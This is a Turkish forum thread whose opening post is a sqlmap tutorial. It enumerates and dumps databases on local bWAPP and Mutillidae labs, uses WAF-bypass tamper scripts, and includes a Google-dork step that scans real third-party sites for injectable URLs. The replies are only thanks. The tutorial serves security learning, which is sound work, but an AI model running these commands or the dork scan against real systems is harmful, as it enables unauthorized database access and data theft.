IRCRehberi.Net- Türkiyenin En iyi IRC ve Genel Forum Sitesi  
 sohbet
derya sohbet
Kayıt ol
Güncel Konular
irc.Soyle.NET Sunucusu Tüm Hakları İle Satın Alınmıştır..     */ ZurnaSohbet.Com.TR - Yeni Arayüzü Çalışması     TRmIRC.Net Satılıktır...     Sunucu Rehberi - Dostyeri.Org     Meepress: Full SEO Uyumlu ve Yaratıcı Haber Scripti     Wordpress Sohbet Siteleri İçin Öneriler Eklentisi ÇIKTI ve ÜCRETSİZ     10 bin Kişi Getirecek DJ Ve admin ALımları...     SuperSohbet.Net Güncel Yönetim Kadrosu     Satılık Radyo Domaini     Sohbet Chat Makaleleri Alınacaktır.    Sunucu Polemiği - AyYildizSohbet.Com & AyYildizFM    🎙️Radyo Polemiği 57- DostCanlar.Net & DostCanlar-Fm🎤📻    Ayın Editörü - Astrea    Ne Seninle Ne Sensiz - Brittle


5Beğeni(ler)
  • 2 Post By Sim
  • 1 Post By Publisher
  • 1 Post By Reyhan
  • 1 Post By She


Yeni Konu Aç
Cevap Yaz
  
 
Seçenekler Stil
Alt 18 Mayıs 2021, 10:04   #1
KuzenKit - ait Kullanıcı Resmi (Avatar)
Standart Linux SqlMap Kullanımı.
Linux SqlMap Kullanımı.

Sqlmap sql injection açıkları için geliştirilmiş çok ileri seviye bir araçtır. Python diliyle yazılmıştır. Sqlmap başlı başına ayrı bir kitap konusu bu yüzden biz genel olarak basit bir şekilde kullanımını ve bir kaç modülünü göreceğiz. Sqlmap, sqlmap [parametreler] şeklinde kullanılır. Bilgi ve yardım için -h parametresini kullanabilirsiniz. İleri düzey parametreler için - hh komutu ile öğrenebilir ve bilgi alabilirsiniz.

Komut:

Kod

sqlmap -hh
Linux SqlMap Kullanımı.

Temel olarak tüm bağlantılarda kullanacağımız temel komut aşağıdaki gibidir.

Komut:

Kod

sqlmap -u “hedefsite.com/index.php?id=” --dbs
İlk adımda bir dork tarayıp daha sonra localde kurduğumuz bir script üzerinden sql inj. saldırısı gerçekleştirelim. Dork taraması için -g parametresini kullanmamız gerekmektedir.

Dork:

Alıntı:
inurl:news.php?id=
Komut:

Kod

sqlmap -u "inurl:news.php?id="
Linux SqlMap Kullanımı.

Burada verdiğimiz dork ile tek tek siteleri çekip ve çekilen sitede sql açığı olup olmadığını bizlere soruyor. Eğer hedef bağlantıda sql inj. açığı mevcut değil ise bir sonraki siteye geçer ve her site için kontrol edilip edilmeyeceğini bize sorar.

Hedef Site:

Alıntı:
[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
Hedef site local’de çalıştırdığım bWAPP scriptidir. Bwapp scripti hakkında detaylı bilgi lab uygulamalarında verilmiştir.

Sql injection olan ilk soruyu açtığımızda bir arama formu çıkıp “’” meta karakteri ile hatayı aldık.

Linux SqlMap Kullanımı.

şekilde görüldüğü gibi hatamızı aldık. Bunu sqlmap vasıtasıyla verileri çekelim. Sql inj. ile verileri çekmeden önce kurduğumuz sistem kullanıcı girişi yapıldıktan sonra sql inj. tespit edilmiştir. Bundan yola çıkarak sqlmap direk sisteme erişim sağlayamacağı için sqlmap’e cookieleri girmemiz gerekmektedir. Cookieleri çekmek için herhangi bir cookie editör kullanabilirsiniz.

Linux SqlMap Kullanımı.

Cookie:

Alıntı:
cpd3s47416v7j9pd55od17vrf1
Security Level:

Alıntı:
0
Bunları sqlmap’te tanımlamak için –cookie parametresi kullanacağız.

Komut:

Kod

sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' --dbs
Linux SqlMap Kullanımı.

Veritabanını çektik sıra tablolarda –tables parametreleri ile çekilir.

Komut:

Kod

sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP --tables
Linux SqlMap Kullanımı.

bWAPP adlı veritabanındaki tabloları çekmiş olduk. Kolonları çekmek için –columns parametresi kullanılır.

Komut:

Kod

sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP -T blog --columns
Sonuç:

Alıntı:
Database: bWAPP

Table: blog
[4 columns]
+--------+--------------+
| Column | Type
|
+--------+--------------+
| date | datetime
|
| entry | varchar(500) |
| id
| int(10)
|
| owner | varchar(100) |
+--------+--------------+
Kolonlardaki verileri çekmek için –dump parametresi kullanılır.

Komut:

Kod

sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP -T blog -C id,date --dump
Örnek olarak burada id,date veri çekilme işlemi yapıldı içi boş değerler olduğu için sonuç vermedi. Bu işlemlerin tamamını çıktı olarak /root/.sqlmap/output/analiziyapılan şeklinde olarak txt formatında çıktımızı vermektedir.

Dosya Yolu:

Alıntı:
/root/.sqlmap/output/target
Sqlmap Waf Bypass Scriptleri

Hedef sistemde sql injectin varsa bile ve hedef sistemde waf olması durumlarda Waf Bypass scriptleri kullanılmaktadır. Bu scriptlere genel olarak tamper denilmektedir. Tamper scriptleri SqlMap’ın kurulu olduğu dizin altındaki tamper klasöründe bulunmaktadır.

Komut:

Kod

cd /usr/share/sqlmap/tamper
ls
Linux SqlMap Kullanımı.

Tamper scriptleri python ile yazılmış olup tüm scriptlerin neler yapabileceğini öğrenmek isterseniz biraz programlama dili biliyorsanız scriptleride anlıyabilirsiniz. –tamper parametresi ile kullanılmaktadır. Bir örnek ile gösterecek olursak;

Örnek:

Kod

sqlmap -u http://localhost/lab/mutillidae/index.php?page=user-info.php&username=%27&password=bug&user-info-php-submit-button=View+Account+Details --dbs --tamper=space2comment


Kaynak: Kali Linux Sayfa 142
 
Alıntı Yap
Alt 18 Mayıs 2021, 10:07   #2
Sim
civciv~🐥
Sim - ait Kullanıcı Resmi (Avatar)
Standart
okuyup okuyup hicbir sey anlamiyorum resmen bu islerle ilgilenenlere helal olsun paylasim icin tesekkürler emegine saglik

________________

Hope. . . ✨
 
Alıntı Yap
Alt 18 Mayıs 2021, 10:14   #3
Edebî
Publisher - ait Kullanıcı Resmi (Avatar)
Standart
Emeğine sağlık @[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

 
Alıntı Yap
Alt 18 Mayıs 2021, 11:10   #4
Cumhuriyet Kadını
Reyhan - ait Kullanıcı Resmi (Avatar)
Standart
Emeğinize sağlık

________________

bazen insanlar iyilesmek istemez.
cünkü ,
icindeki acı sevdiklerinin son hatirasidir..


per aspera ad astra ✨
 
Alıntı Yap
Alt 18 Mayıs 2021, 11:11   #5
She
✰ ÖzeL..
She - ait Kullanıcı Resmi (Avatar)
Standart
Emeğine sağlık teşekkür ederiz konu için.

________________

~ E & B ~
 
Alıntı Yap
Cevap Yaz

« Linux Shodan Kullanımı. | Linux Armitage Kullanımı. »

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok
BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı




Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 12:25.

İçerik sağlayıcı paylaşım forumlarından biri olan ircrehberi.net sitemizde T.C.K 20.ci Madde ve 5651 Sayılı Kanun'un 4.cü maddesinin (2).ci fıkrasına göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. ircrehberi.net hakkında yapılacak tüm hukuki şikayetlere ilişkin iletişim sayfasından Veya E-Mail ile irtibata geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 15 (On beş) gün içinde tarafımızca gerekli aksiyon alınacak ve size dönüş yapılacaktır.
Chat Chat Sohbet Okey Oyna sohbet mobil sohbet Uğur Ücretsiz Sohbet odalari Sohbetci
IRCRehberi.Net- Türkiyenin En iyi IRC ve Genel Forum Sitesi Arşiv Gizlilik Bildirimi Kullanım Koşulları İletişim
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Copyright ©2019 - 2023 | IRCRehberi